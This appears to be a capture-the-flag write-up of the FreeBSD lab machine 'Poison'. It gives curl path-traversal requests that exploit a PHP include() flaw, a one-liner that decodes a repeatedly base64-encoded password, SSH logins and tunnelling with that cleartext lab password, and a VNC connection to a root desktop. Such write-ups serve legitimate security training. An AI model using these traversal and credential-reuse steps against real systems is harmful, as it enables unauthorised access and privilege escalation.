Post

Poison

A PHP application passes user-supplied filenames directly to include() with no validation, enabling LFI that leaks a 13x base64-encoded password — decoding it yields SSH credentials for charix, who holds a VNC password file granting a root graphical desktop session.

Poison

Overview

Poison is a medium-difficulty FreeBSD box built around two realistic misconfigurations. The web application uses PHP’s include() on an unsanitized file GET parameter, giving a path traversal primitive that reads pwdbackup.txt — a base64-encoded password stacked thirteen times. Decoding it yields SSH credentials for charix. In the home directory sits secret.zip, extractable with the same password; it contains an 8-byte VNC password file for an Xvnc session running as root on localhost. An SSH port-forward exposes port 5901 and vncviewer -passwd secret drops into a root desktop, completing the chain.

Machine Matrix

Enumeration Real-Life CVE Custom Exploitation CTF-like

High Real-Life score reflects that unsanitized PHP includes and VNC running as root are both production misconfigurations; the slight CTF-like score comes from the 13-layer base64 encoding, which is contrived but the underlying vulnerability chain is authentic.

Recon

PortServiceNotes
22SSH (OpenSSH)FreeBSD; used for foothold and tunnel
80HTTP (Apache)PHP web app with filename include feature
1
2
nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.X
nmap -p22,80 -sC -sV -Pn 10.10.10.X

The scan reveals only two ports: SSH and a PHP-driven web app on 80. The web app’s homepage mentions a file viewer, which immediately flags the file parameter as an LFI candidate.

Enumeration

Browsing the web app shows a form that passes a file parameter to browse.php. Probing with listfiles.php (itself an included file that outputs a directory listing) reveals the full webroot contents — including pwdbackup.txt.

1
curl -s 'http://10.10.10.X/browse.php?file=listfiles.php'

The path traversal primitive confirms itself immediately:

1
curl -s 'http://10.10.10.X/browse.php?file=../../../../../etc/passwd'

/etc/passwd leaks cleanly — the user charix is visible. Next, fetch the credential file:

1
curl -s 'http://10.10.10.X/browse.php?file=pwdbackup.txt'

The file contains a base64 blob with a note that it has been encoded 13 times. Decode it in a single Python one-liner:

1
python3 -c "import base64; data=open('pwdbackup.txt').read().strip(); [data:=base64.b64decode(data).decode() for _ in range(13)]; print(data)"

Result: Charix!2#4%6&8(0

Foothold

With credentials in hand, SSH directly as charix:

1
sshpass -p 'Charix!2#4%6&8(0' ssh [email protected]

The login succeeds and lands a shell as charix.

User flag

1
cat /home/charix/user.txt   # HTB{...}

Foothold as charix obtained and the user flag captured.

Privilege Escalation

On the box, check running processes and listening ports to identify escalation paths:

1
2
ps aux | grep -i vnc
netstat -an | grep LISTEN

Xvnc is running on 127.0.0.1:5901 as root. The home directory contains secret.zip; it opens with the same password used for SSH, a classic credential reuse pattern. Extract it on the attacker machine:

1
sshpass -p 'Charix!2#4%6&8(0' scp [email protected]:~/secret.zip ./
1
unzip -P 'Charix!2#4%6&8(0' secret.zip

Inspecting the extracted secret file shows an 8-byte binary — the VNC DES-encrypted password file format. Set up an SSH tunnel to forward the localhost-only VNC port:

1
sshpass -p 'Charix!2#4%6&8(0' ssh -L 5901:127.0.0.1:5901 -N -f [email protected]

Connect with vncviewer, pointing it at the password file:

1
vncviewer -passwd ./secret 127.0.0.1:5901

The VNC session opens a graphical desktop running as root. The escalation is purely a misconfiguration — CWE-250 (execution with unnecessary privileges) — not an exploit. Open a terminal in the desktop or read the flag directly from the VNC session.

Root flag

1
cat /root/root.txt   # HTB{...}

Full compromise of Poison confirmed — root access obtained via a misconfigured VNC server running with unnecessary root privileges.

This post is licensed under CC BY 4.0 by the author.